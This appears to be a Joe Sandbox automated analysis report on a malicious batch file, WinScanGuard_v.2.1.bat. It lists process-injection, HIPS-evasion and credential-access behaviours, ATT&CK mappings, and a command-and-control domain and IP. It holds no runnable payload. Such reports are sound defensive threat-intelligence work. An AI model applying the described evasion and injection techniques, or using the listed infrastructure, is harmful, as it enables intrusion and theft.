              Source: dwm.exe, 0000001E.00000002.2927665635.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000001E.00000000.2057222338.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: winlogon.exe, 00000018.00000000.2043727708.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.2916405996.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001E.00000002.2930465673.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: winlogon.exe, 00000018.00000000.2043727708.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.2916405996.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001E.00000002.2930465673.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: winlogon.exe, 00000018.00000000.2043727708.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.2916405996.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001E.00000002.2930465673.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: winlogon.exe, 00000018.00000000.2043727708.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000018.00000002.2916405996.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001E.00000002.2930465673.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
              Source: C:\Windows\$sxr-cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,16_2_00007FF6155051EC
              Source: C:\Windows\$sxr-cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,16_2_00007FF6154F6EE4
              Source: C:\Windows\$sxr-cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,16_2_00007FF615503140
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\$sxr-powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00AAE1540 cpuid 13_2_000001A00AAE1540
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDB7AE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_000001A00BDB7AE0
              Source: C:\Windows\System32\dllhost.exeCode function: 22_2_000000014000165C CreateNamedPipeW,22_2_000000014000165C
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_00007FF7142F1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,13_2_00007FF7142F1008
              Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
              1
              Valid Accounts
              1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              11
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
              Default Accounts1
              Scripting
              1
              Valid Accounts
              1
              Valid Accounts
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory3
              File and Directory Discovery
              Remote Desktop Protocol1
              Email Collection
              Exfiltration Over Bluetooth1
              Non-Standard Port
              SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
              Domain Accounts2
              Native API
              1
              Scheduled Task/Job
              11
              Access Token Manipulation
              1
              Scripting
              Security Account Manager37
              System Information Discovery
              SMB/Windows Admin Shares11
              Input Capture
              Automated Exfiltration1
              Non-Application Layer Protocol
              Data Encrypted for ImpactDNS ServerEmail Addresses
              Local Accounts21
              Command and Scripting Interpreter
              Login Hook413
              Process Injection
              1
              Obfuscated Files or Information
              NTDS1
              Query Registry
              Distributed Component Object ModelInput CaptureTraffic Duplication1
              Application Layer Protocol
              Data DestructionVirtual Private ServerEmployee Names
              Cloud Accounts1
              Scheduled Task/Job
              Network Logon Script1
              Scheduled Task/Job
              3
              Software Packing
              LSA Secrets41
              Security Software Discovery
              SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
              Replication Through Removable Media31
              PowerShell
              RC ScriptsRC Scripts1
              Timestomp
              Cached Domain Credentials2
              Process Discovery
              VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
              External Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync41
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
              Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
              Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
              Masquerading
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
              Supply Chain CompromisePowerShellCronCron1
              Valid Accounts
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses
              Compromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
              Virtualization/Sandbox Evasion
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingExfiltration Over Unencrypted Non-C2 ProtocolMail ProtocolsFirmware CorruptionDomainsNetwork Security Appliances
              Compromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
              Access Token Manipulation
              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureExfiltration Over Physical MediumDNSResource HijackingDNS ServerGather Victim Org Information
              Compromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers413
              Process Injection
              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionExfiltration over USBProxyNetwork Denial of ServiceVirtual Private ServerDetermine Physical Locations
              Trusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
              Hidden Files and Directories
              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionCommonly Used PortInternal ProxyDirect Network FloodServerBusiness Relationships
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1352643 Sample: WinScanGuard_v.2.1.bat Startdate: 03/12/2023 Architecture: WINDOWS Score: 100 93 throbbing-mountain-09011.pktriot.net 2->93 95 eu-central-7075.packetriot.net 2->95 113 Multi AV Scanner detection for domain / URL 2->113 115 Malicious sample detected (through community Yara rule) 2->115 117 Detected unpacking (creates a PE file in dynamic memory) 2->117 119 6 other signatures 2->119 12 $sxr-mshta.exe 1 2->12         started        15 cmd.exe 2 2->15         started        signatures3 process4 file5 145 Drops executables to the windows directory (C:\Windows) and starts them 12->145 18 $sxr-cmd.exe 1 12->18         started        91 C:\Users\user\...\WinScanGuard_v.2.1.bat.exe, PE32+ 15->91 dropped 147 Renames powershell.exe to bypass HIPS 15->147 21 WinScanGuard_v.2.1.bat.exe 4 21 15->21         started        24 conhost.exe 15->24         started        signatures6 process7 file8 99 Suspicious powershell command line found 18->99 101 Very long command line found 18->101 103 Bypasses PowerShell execution policy 18->103 26 $sxr-powershell.exe 13 18->26         started        30 conhost.exe 18->30         started        85 C:\Windows\$sxr-powershell.exe, PE32+ 21->85 dropped 87 C:\Windows\$sxr-mshta.exe, PE32+ 21->87 dropped 89 C:\Windows\$sxr-cmd.exe, PE32+ 21->89 dropped 105 Deletes itself after installation 21->105 107 Writes to foreign memory regions 21->107 109 Modifies the context of a thread in another process (thread injection) 21->109 111 3 other signatures 21->111 32 dllhost.exe 21->32         started        34 dllhost.exe 21->34         started        36 dllhost.exe 21->36         started        38 dllhost.exe 21->38         started        signatures9 process10 dnsIp11 97 eu-central-7075.packetriot.net 167.71.56.116, 22112, 49736, 49737 DIGITALOCEAN-ASNUS United States 26->97 137 Suspicious powershell command line found 26->137 139 Very long command line found 26->139 141 Drops executables to the windows directory (C:\Windows) and starts them 26->141 143 8 other signatures 26->143 40 dllhost.exe 26->40         started        43 dllhost.exe 26->43         started        45 dllhost.exe 26->45         started        49 6 other processes 26->49 47 WerFault.exe 22 16 32->47         started        signatures12 process13 signatures14 129 Writes to foreign memory regions 40->129 131 Creates a thread in another existing process (thread injection) 40->131 133 Injects a PE file into a foreign processes 40->133 51 winlogon.exe 40->51 injected 53 lsass.exe 40->53 injected 56 svchost.exe 40->56 injected 58 dwm.exe 40->58 injected 60 WmiPrvSE.exe 43->60 injected 62 PHZMpSLEzcFKaRUZszZmeOVApLd.exe 43->62 injected 64 PHZMpSLEzcFKaRUZszZmeOVApLd.exe 43->64 injected 66 PHZMpSLEzcFKaRUZszZmeOVApLd.exe 45->66 injected 135 Powershell is started from unusual location (likely to bypass HIPS) 49->135 process15 signatures16 68 dllhost.exe 51->68         started        71 dllhost.exe 51->71         started        73 dllhost.exe 51->73         started        75 dllhost.exe 51->75         started        127 Writes to foreign memory regions 53->127 process17 signatures18 121 Writes to foreign memory regions 68->121 123 Creates a thread in another existing process (thread injection) 68->123 125 Injects a PE file into a foreign processes 68->125 77 svchost.exe 68->77 injected 79 svchost.exe 68->79 injected 81 svchost.exe 68->81 injected 83 svchost.exe 71->83 injected process19

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              WinScanGuard_v.2.1.bat0%ReversingLabs
              WinScanGuard_v.2.1.bat3%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe0%ReversingLabs
              C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe0%VirustotalBrowse
              C:\Windows\$sxr-cmd.exe0%ReversingLabs
              C:\Windows\$sxr-cmd.exe0%VirustotalBrowse
              C:\Windows\$sxr-mshta.exe0%ReversingLabs
              C:\Windows\$sxr-mshta.exe0%VirustotalBrowse
              C:\Windows\$sxr-powershell.exe0%ReversingLabs
              C:\Windows\$sxr-powershell.exe0%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              eu-central-7075.packetriot.net16%VirustotalBrowse
              throbbing-mountain-09011.pktriot.net2%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://james.newtonking.com/projects/json0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              eu-central-7075.packetriot.net
              167.71.56.116
              truetrueunknown
              throbbing-mountain-09011.pktriot.net
              unknown
              unknowntrueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046472218.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908118338.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  https://stackoverflow.com/q/14436606/23354$sxr-powershell.exe, 00000012.00000002.2928056042.0000028528E04000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://www.newtonsoft.com/jsonschema$sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.newtonsoft.com/json$sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://upx.sf.netAmcache.hve.10.drfalse
                                  high
                                  https://www.nuget.org/packages/Newtonsoft.Json.Bson$sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/pscore6$sxr-powershell.exe, 00000015.00000002.2927032534.000002428794F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://aka.ms/pscore68WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.00000285285E1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000015.00000002.2927032534.0000024287975000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000019.00000000.2046472218.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908118338.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.00000285285E1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000015.00000002.2927032534.000002428799C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://james.newtonking.com/projects/json$sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://aka.ms/Vh5j3k$sxr-mshta.exe, 0000000D.00000002.2917110489.000001A00A80C000.00000004.00000020.00020000.00000000.sdmp, $sxr-mshta.exe, 0000000D.00000003.1934060188.000001A00A80F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/JamesNK/Newtonsoft.Json$sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/dahall/taskschedulerWinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aka.ms/odirm$sxr-mshta.exe, 0000000D.00000002.2917110489.000001A00A80C000.00000004.00000020.00020000.00000000.sdmp, $sxr-mshta.exe, 0000000D.00000003.1934060188.000001A00A80F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        167.71.56.116
                                                        eu-central-7075.packetriot.netUnited States
                                                        14061DIGITALOCEAN-ASNUStrue
                                                        Joe Sandbox Version:38.0.0 Ammolite
                                                        Analysis ID:1352643
                                                        Start date and time:2023-12-03 16:54:14 +01:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 11m 13s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:33
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:12
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample file name:WinScanGuard_v.2.1.bat
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winBAT@49/18@1/1
                                                        EGA Information:
                                                        • Successful, ratio: 93.3%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 87
                                                        • Number of non-executed functions: 289
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .bat
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.42.65.92
                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target dllhost.exe, PID 7132 because there are no executed function
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                        TimeTypeDescription
                                                        16:55:14API Interceptor26x Sleep call for process: WinScanGuard_v.2.1.bat.exe modified
                                                        16:55:29API Interceptor1x Sleep call for process: WerFault.exe modified
                                                        16:55:32API Interceptor149691x Sleep call for process: $sxr-powershell.exe modified
                                                        16:56:15API Interceptor112145x Sleep call for process: winlogon.exe modified
                                                        16:56:17API Interceptor104518x Sleep call for process: dwm.exe modified
                                                        16:56:18API Interceptor69431x Sleep call for process: lsass.exe modified
                                                        16:56:19API Interceptor1018x Sleep call for process: svchost.exe modified
                                                        16:56:21API Interceptor343x Sleep call for process: PHZMpSLEzcFKaRUZszZmeOVApLd.exe modified
                                                        16:56:23API Interceptor220x Sleep call for process: conhost.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        167.71.56.116Shadow-Stealer.batGet hashmaliciousQuasarBrowse
                                                          OvA6x5v34G.exeGet hashmaliciousAsyncRATBrowse
                                                            zUYpYikG7T.exeGet hashmaliciousnjRatBrowse
                                                              SdwkQEBnc3.exeGet hashmaliciousNanocoreBrowse
                                                                riV1K85Awe.exeGet hashmaliciousNanocoreBrowse
                                                                  Malwarebytes Gears.exeGet hashmaliciousAsyncRATBrowse
                                                                    H8RZSly6dG.exeGet hashmaliciousNjratBrowse
                                                                      8E8732B9BEBC8382E938B48697E79FEB4B06528DF41FD.exeGet hashmaliciousnjRatBrowse
                                                                        qCotr6jZt2.exeGet hashmaliciousnjRatBrowse
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          eu-central-7075.packetriot.netShadow-Stealer.batGet hashmaliciousQuasarBrowse
                                                                          • 167.71.56.116
                                                                          OvA6x5v34G.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 167.71.56.116
                                                                          zUYpYikG7T.exeGet hashmaliciousnjRatBrowse
                                                                          • 167.71.56.116
                                                                          SdwkQEBnc3.exeGet hashmaliciousNanocoreBrowse
                                                                          • 167.71.56.116
                                                                          riV1K85Awe.exeGet hashmaliciousNanocoreBrowse
                                                                          • 167.71.56.116
                                                                          Malwarebytes Gears.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 167.71.56.116
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          DIGITALOCEAN-ASNUSShadow-Stealer.batGet hashmaliciousQuasarBrowse
                                                                          • 167.71.56.116
                                                                          76IbxcfOQf.exeGet hashmaliciousLokibotBrowse
                                                                          • 178.128.238.137
                                                                          file.exeGet hashmaliciousRedLine, SmokeLoader, StealcBrowse
                                                                          • 37.139.22.180
                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                          • 37.139.22.180
                                                                          REQUEST FOR 01-DEC 2023.exeGet hashmaliciousFormBookBrowse
                                                                          • 64.225.91.73
                                                                          Altogether.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 64.225.91.73
